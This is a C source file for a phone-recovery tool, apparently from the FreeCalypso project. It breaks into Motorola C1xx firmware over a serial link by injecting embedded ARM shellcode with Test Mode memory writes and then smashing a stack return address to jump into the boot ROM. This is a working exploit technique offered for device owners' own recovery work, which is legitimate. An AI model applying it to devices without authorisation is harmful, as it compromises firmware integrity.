/*
 * This program facilitates the recovery of those Compal/Motorola phones
 * whose bootloaders have been maliciously locked down. It connects
 * to a running Mot C1xx firmware through the RVTMUX interface provided
 * by the latter and uses the Test Mode memory write command (which
 * these firmwares implement just like TI's reference fw) to inject
 * some shellcode and to transfer control to it by overwriting a
 * function return address on the stack. The injected shellcode then
 * enables the Calypso boot ROM and jumps to it, allowing fc-loadtool
 * to take over from there.
 */
12 |
13 #include <sys/types.h> |
14 #include <sys/errno.h> |
15 #include <stdio.h> |
16 #include <string.h> |
17 #include <strings.h> |
18 #include <stdlib.h> |
19 #include <unistd.h> |
20 #include <time.h> |
21 #include "../include/pktmux.h" |
22 #include "../include/limits.h" |
23 |
/* Serial port state shared with the other source files of this program */
extern int target_fd;		/* fd of the open target tty, used by select() in main() */
extern char *baudrate_name;	/* defaulted to "57600" in main(), overridable with -B */

/* Receive-side packet buffer owned by another source file */
extern u_char rxpkt[];
extern size_t rxpkt_len;

/* Session log: -l option gives the name, main() opens the file */
char *logfname;
FILE *logF;
time_t logtime;		/* stamped by time() in main() before each packet is handled */
int no_output; /* for output.c */

/* Set from the -w option in main(); where it is consumed lies outside this file's visible part */
int wakeup_after_sec = 1;
36 |
37 /* see ../../target-utils/tf-breakin/payload.S for the source */ |
38 static u_char shellcode[114] = { |
39 0x78, 0x47, 0xC0, 0x46, 0xD3, 0xF0, 0x21, 0xE3, |
40 0x50, 0x10, 0x9F, 0xE5, 0xF5, 0x00, 0xA0, 0xE3, |
41 0xB2, 0x00, 0xC1, 0xE1, 0xA0, 0x00, 0xA0, 0xE3, |
42 0xB2, 0x00, 0xC1, 0xE1, 0x40, 0x60, 0x9F, 0xE5, |
43 0x05, 0x00, 0xD6, 0xE5, 0x20, 0x00, 0x10, 0xE3, |
44 0xFC, 0xFF, 0xFF, 0x0A, 0x38, 0x10, 0x8F, 0xE2, |
45 0x06, 0x20, 0xA0, 0xE3, 0x01, 0x00, 0xD1, 0xE4, |
46 0x00, 0x00, 0xC6, 0xE5, 0x01, 0x20, 0x52, 0xE2, |
47 0xFB, 0xFF, 0xFF, 0x1A, 0x05, 0x00, 0xD6, 0xE5, |
48 0x40, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A, |
49 0x10, 0x10, 0x9F, 0xE5, 0x01, 0x2C, 0xA0, 0xE3, |
50 0xB0, 0x20, 0xC1, 0xE1, 0x00, 0xF0, 0xA0, 0xE3, |
51 0x02, 0xF8, 0xFF, 0xFF, 0x00, 0x58, 0xFF, 0xFF, |
52 0x10, 0xFB, 0xFF, 0xFF, 0x02, 0x02, 0x02, 0x4F, |
53 0x4B, 0x02 |
54 }; |
55 |
/*
 * Target addresses, parsed as hex from the -a and -s options in main()
 * (the -m option presets both).  A zero stack_smash_addr means "not
 * given": main() then sends the MEMCHECK query instead of calling
 * initiate_breakin() directly.
 */
static unsigned shellcode_load_addr;
static unsigned stack_smash_addr;
/* Nonzero: jump into the shellcode in Thumb state; cleared by -A and -m */
static int thumb_entry = 1;

/* Little-endian shellcode entry address, filled in by initiate_breakin() */
static u_char stack_smash_payload[4];
/* Set by initiate_breakin() once the shellcode write has been sent; read outside the visible part of this file */
static int breakin_in_progress;

/* Name of the tty given on the command line, saved by main() after open_target_serial() */
static char *target_tty_port;
64 |
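/*
 * Send an old TM3 MEM_WRITE command (opcode 0x40) to the target, asking
 * the running firmware to store payload_len bytes at addr.
 *
 * Packet layout as built here: RVT_TM_HEADER, opcode, the 32-bit address
 * least-significant byte first, the payload bytes, then one XOR checksum
 * byte covering everything after the header (opcode through end of payload).
 *
 * addr:        target address to write to
 * payload:     bytes to write; the caller keeps ownership
 * payload_len: number of payload bytes
 *
 * The packet is built in a MAX_PKT_TO_TARGET-byte stack buffer.  A payload
 * that would not fit (7 bytes of framing are needed around it) is reported
 * on stderr and the program exits, matching the error style used in main();
 * the only caller passes a fixed-size array, so this guards future misuse.
 */
static void
send_compal_memwrite(unsigned addr, u_char *payload, int payload_len)
{
	u_char pkt[MAX_PKT_TO_TARGET];
	int i, csum, csum_offset;

	/* 1 header + 1 opcode + 4 address bytes + payload + 1 checksum byte */
	if (payload_len < 0 || (size_t) payload_len > sizeof pkt - 7) {
		fprintf(stderr,
			"send_compal_memwrite: payload of %d bytes does not fit in a packet\n",
			payload_len);
		exit(1);
	}
	pkt[0] = RVT_TM_HEADER;
	pkt[1] = 0x40;	/* old TM3 MEM_WRITE command */
	pkt[2] = addr;
	pkt[3] = addr >> 8;
	pkt[4] = addr >> 16;
	pkt[5] = addr >> 24;
	memcpy(pkt + 6, payload, payload_len);
	csum_offset = payload_len + 6;
	/* XOR checksum over opcode, address and payload; the header byte is excluded */
	csum = 0;
	for (i = 1; i < csum_offset; i++)
		csum ^= pkt[i];
	pkt[csum_offset] = csum;
	send_pkt_to_target(pkt, csum_offset + 1);
}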
87 |
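/*
 * Start the break-in sequence: report the addresses in use, compute the
 * shellcode entry address that the stack smash will plant, and send the
 * shellcode to target RAM with a TM memory write.
 *
 * Reads shellcode_load_addr, stack_smash_addr and thumb_entry (all set
 * from the command line in main()); writes stack_smash_payload and sets
 * breakin_in_progress.  Whoever sends stack_smash_payload is outside the
 * visible part of this file.
 */
static void
initiate_breakin(void)
{
	char msgbuf[80];
	unsigned jump_addr;

	/* bounded write: the message cannot overflow msgbuf even if the format grows */
	snprintf(msgbuf, sizeof msgbuf,
		 "Using shellcode load addr 0x%x, stack smash starting addr 0x%x",
		 shellcode_load_addr, stack_smash_addr);
	output_line(msgbuf);
	/*
	 * Thumb entry: bit 0 of the address selects Thumb state.
	 * ARM entry: skip the first 4 bytes of the shellcode instead.
	 */
	jump_addr = shellcode_load_addr;
	if (thumb_entry)
		jump_addr += 1;
	else
		jump_addr += 4;
	/* least-significant byte first, same encoding as send_compal_memwrite() uses for addr */
	stack_smash_payload[0] = jump_addr;
	stack_smash_payload[1] = jump_addr >> 8;
	stack_smash_payload[2] = jump_addr >> 16;
	stack_smash_payload[3] = jump_addr >> 24;
	output_line("Sending shellcode RAM write");
	send_compal_memwrite(shellcode_load_addr, shellcode, sizeof shellcode);
	breakin_in_progress = 1;
}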
111 |
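/*
 * Send the GPF "PCO L1 MEMCHECK" system primitive to the target.
 * main() calls this when no stack smash address was given; the reply
 * is handled outside the visible part of this file.
 *
 * The 24-byte packet is: RVT_L23_HEADER, primitive id 0xB7, a 16-bit
 * length field, four zero timestamp bytes, then the 16-byte string
 * (15 characters plus its terminating NUL, which is deliberately sent).
 */
static void
send_memcheck_query(void)
{
	/* the NUL terminator is part of the payload, hence sizeof rather than strlen */
	static const char memcheck_str[] = "PCO L1 MEMCHECK";
	u_char sendpkt[25];

	output_line("Sending GPF MEMCHECK query");
	/* fill out the packet */
	sendpkt[0] = RVT_L23_HEADER;
	sendpkt[1] = 0xB7; /* system prim */
	/* 20 = 4 timestamp bytes + 16 string bytes; presumably the primitive length, low byte first — confirm against the GPF format */
	sendpkt[2] = 20;
	sendpkt[3] = 0;
	/* send zeros for the timestamp */
	memset(sendpkt + 4, 0, 4);
	/* fixed string with all fields; memcpy avoids the u_char*/char* mismatch of strcpy */
	memcpy(sendpkt + 8, memcheck_str, sizeof memcheck_str);
	/* send it! */
	send_pkt_to_target(sendpkt, 24);
}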
133 |
134 main(argc, argv) |
135 char **argv; |
136 { |
137 extern char *optarg; |
138 extern int optind; |
139 int c; |
140 fd_set fds; |
141 |
142 baudrate_name = "57600"; /* what C139 firmware uses */ |
143 while ((c = getopt(argc, argv, "a:AB:l:ms:w:")) != EOF) |
144 switch (c) { |
145 case 'a': |
146 shellcode_load_addr = strtoul(optarg, 0, 16); |
147 continue; |
148 case 'B': |
149 baudrate_name = optarg; |
150 continue; |
151 case 'l': |
152 logfname = optarg; |
153 continue; |
154 case 'm': |
155 /* mimic mot931c.exe */ |
156 shellcode_load_addr = 0x800000; |
157 stack_smash_addr = 0x837C54; |
158 /* FALL THRU */ |
159 case 'A': |
160 thumb_entry = 0; |
161 continue; |
162 case 's': |
163 stack_smash_addr = strtoul(optarg, 0, 16); |
164 continue; |
165 case 'w': |
166 wakeup_after_sec = strtoul(optarg, 0, 0); |
167 continue; |
168 case '?': |
169 default: |
170 usage: fprintf(stderr, |
171 "usage: %s [options] ttyport\n", argv[0]); |
172 exit(1); |
173 } |
174 if (argc - optind != 1) |
175 goto usage; |
176 if (stack_smash_addr && !shellcode_load_addr) { |
177 fprintf(stderr, "usage error: -a option required with -s\n"); |
178 exit(1); |
179 } |
180 open_target_serial(argv[optind]); |
181 target_tty_port = argv[optind]; |
182 |
183 set_serial_nonblock(0); |
184 setlinebuf(stdout); |
185 if (logfname) { |
186 logF = fopen(logfname, "w"); |
187 if (!logF) { |
188 perror(logfname); |
189 exit(1); |
190 } |
191 setlinebuf(logF); |
192 fprintf(logF, "*** Log of TFC139 break-in session ***\n"); |
193 } |
194 time(&logtime); |
195 if (stack_smash_addr) |
196 initiate_breakin(); |
197 else |
198 send_memcheck_query(); |
199 for (;;) { |
200 FD_ZERO(&fds); |
201 FD_SET(target_fd, &fds); |
202 c = select(target_fd+1, &fds, 0, 0, 0); |
203 time(&logtime); |
204 if (c < 0) { |
205 if (errno == EINTR) |
206 continue; |
207 perror("select"); |
208 exit(1); |
209 } |
210 if (FD_ISSET(target_fd, &fds)) |
211 process_serial_rx(); |
212 } |
213 } |
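/*
 * Handle a Test Mode (TM) response packet from the target.
 *
 * Called from handle_rx_packet() for RVT_TM_HEADER packets after the
 * packet has been printed.  The only response that advances the
 * break-in sequence is the exact 4-byte acknowledgement we expect for
 * the memory write sent last (rxpkt[0] is the RVT header, already
 * matched by the caller; the remaining bytes must be 0x40, 0x00, 0x40).
 * On that ack the 4 bytes at stack_smash_payload are written at
 * stack_smash_addr and the address is advanced by 4.  A response that
 * arrives while no break-in is in progress, or that differs from the
 * expected ack, is reported on the output and otherwise ignored.
 *
 * Globals read: breakin_in_progress, rxpkt, rxpkt_len, stack_smash_addr,
 * stack_smash_payload.  Globals written: stack_smash_addr.
 */
static void
handle_tm_response()
{
	char msgbuf[80];

	if (!breakin_in_progress) {
		output_line("TM response unexpected at this time");
		return;
	}
	/* length is checked first so the byte indices below are in range */
	if (rxpkt_len != 4 || rxpkt[1] != 0x40 || rxpkt[2] || rxpkt[3] != 0x40){
		output_line("TM response differs from expected");
		return;
	}
	/*
	 * The message fits in msgbuf for any 32-bit address, but use the
	 * bounded formatter anyway so the buffer size is enforced here.
	 */
	snprintf(msgbuf, sizeof msgbuf, "Sending stack smash write at 0x%x",
		 stack_smash_addr);
	output_line(msgbuf);
	send_compal_memwrite(stack_smash_addr, stack_smash_payload, 4);
	stack_smash_addr += 4;
}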
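/*
 * Look for the one GPF trace line the break-in depends on: a line from
 * "SYSTPCO" whose text matches the format string below, reporting the
 * stack base address and the untouched stack size of the task named L1.
 *
 * Called from handle_rx_packet() for RVT_L23_HEADER packets while no
 * break-in is in progress.  Any packet that is not that trace line is
 * silently ignored.  The checks are ordered so that every index into
 * rxpkt is covered by a preceding length test: the 17..128 byte range
 * check covers rxpkt[1..3], the 8-byte compare at offset 8 and the
 * text starting at offset 16 that sscanf() reads after a NUL has been
 * placed at rxpkt[rxpkt_len].
 *
 * On a successful parse the parsed values are reported; the base must
 * be word-aligned and the untouched size is rounded down to a whole
 * word.  If shellcode_load_addr is still zero it is set to the stack
 * base, after first checking that the untouched region can hold the
 * shellcode.  stack_smash_addr becomes stackbase + untouched and
 * initiate_breakin() is called.
 *
 * Exits with status 1 if the stack base is not word-aligned or the
 * untouched region is too small for the shellcode.
 *
 * Globals read: rxpkt, rxpkt_len, shellcode, shellcode_load_addr.
 * Globals written: rxpkt (NUL terminator appended), shellcode_load_addr,
 * stack_smash_addr.
 */
static void
analyze_gpf_packet()
{
	unsigned stackbase, untouched;
	static char format[] =
	"Name:L1 Stat:%*s Count:%*s Prio:%*s Stack:%x Size:%*s Untouched:%u";
	char msgbuf[80];

	/* shortest packet that can carry header, ids and a text body */
	if (rxpkt_len < 17 || rxpkt_len > 128)
		return;
	/* it needs to be a trace packet */
	if ((rxpkt[1] & 0xF0) != 0xA0)
		return;
	/* check the length */
	if (rxpkt[2] + 4 != rxpkt_len)
		return;
	if (rxpkt[3])
		return;
	/* skip timestamp, check src and dest */
	if (strncmp(rxpkt + 8, "SYSTPCO ", 8))
		return;
	/*
	 * terminating NUL for sscanf; rxpkt_len <= 128 was checked above.
	 * NOTE(review): this writes one byte past the received data, so the
	 * rxpkt array must be at least 129 bytes long -- confirm where it
	 * is declared.
	 */
	rxpkt[rxpkt_len] = '\0';
	if (sscanf(rxpkt + 16, format, &stackbase, &untouched) != 2)
		return;
	/* success! */
	/*
	 * The longest possible message is 76 characters, so it fits, but
	 * bound the write to msgbuf explicitly rather than by arithmetic.
	 */
	snprintf(msgbuf, sizeof msgbuf,
		 "Parsed L1 stack location: base=0x%x, untouched=%u (0x%x)",
		 stackbase, untouched, untouched);
	output_line(msgbuf);
	if (stackbase & 3) {
		output_line("Error: stack base address is not word-aligned");
		exit(1);
	}
	/* round the untouched size down to a whole word */
	untouched &= ~3;
	if (!shellcode_load_addr) {
		if (untouched < sizeof shellcode) {
			output_line("Error: not enough room for shellcode");
			exit(1);
		}
		shellcode_load_addr = stackbase;
	}
	stack_smash_addr = stackbase + untouched;
	initiate_breakin();
}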
/*
 * Dispatch one complete received RVTMUX packet held in rxpkt/rxpkt_len.
 *
 * A bare two-byte "OK" packet is the success indication: the success
 * line and the fc-loadtool invocation for target_tty_port are printed
 * and the program exits with status 0.  Otherwise the first byte
 * selects the RVT channel: RV, L1 and L23 trace packets are printed
 * (an L23 packet is additionally handed to analyze_gpf_packet() while
 * no break-in is in progress), TM packets are printed raw and passed
 * to handle_tm_response(), and anything else -- including an RV packet
 * shorter than 6 bytes -- goes to print_unknown_packet().
 *
 * NOTE(review): the return type is implicit int (pre-C99 style) and no
 * value is ever returned; rxpkt[0] is read without checking that
 * rxpkt_len is non-zero, which presumably the caller guarantees --
 * confirm in the packet receiver.
 *
 * Globals read: rxpkt, rxpkt_len, breakin_in_progress, target_tty_port.
 */
handle_rx_packet()
{
	if (rxpkt_len == 2 && !memcmp(rxpkt, "OK", 2)) {
		output_line(
			"Success: target should now be in boot ROM download wait");
		printf("You can now run fc-loadtool -h compal -c none %s\n",
			target_tty_port);
		exit(0);
	}
	switch (rxpkt[0]) {
	case RVT_RV_HEADER:
		/* an RV trace needs at least the 6-byte header */
		if (rxpkt_len >= 6) {
			print_rv_trace();
			return;
		}
		break;
	case RVT_L1_HEADER:
		print_l1_trace();
		return;
	case RVT_L23_HEADER:
		print_g23_trace();
		if (!breakin_in_progress)
			analyze_gpf_packet();
		return;
	case RVT_TM_HEADER:
		print_tm_output_raw();
		handle_tm_response();
		return;
	default:
		break;
	}
	/* reached for unrecognised channels and for short RV packets */
	print_unknown_packet();
}